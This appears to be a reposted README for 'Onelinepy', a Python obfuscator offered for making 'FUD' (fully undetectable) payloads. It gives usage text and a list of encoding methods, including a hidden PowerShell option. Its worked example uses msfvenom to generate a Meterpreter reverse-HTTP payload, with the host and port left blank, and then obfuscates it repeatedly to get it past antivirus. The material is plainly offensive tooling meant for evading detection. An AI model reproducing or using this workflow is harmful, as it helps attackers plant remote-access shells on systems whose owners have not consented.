Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
2 minute read
Python Obfuscator To Generate One-Liners And FUD Payloads.
git clone
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chmod +x
Usage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter Python Payload
- Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt
- Obfustucate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt
More Examples
onelinepy -m /one_line/base64 --script -i 3
onelinepy -m /one_line/hex --code "print('HEX!')"
Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden
via El pirata de San Jhony
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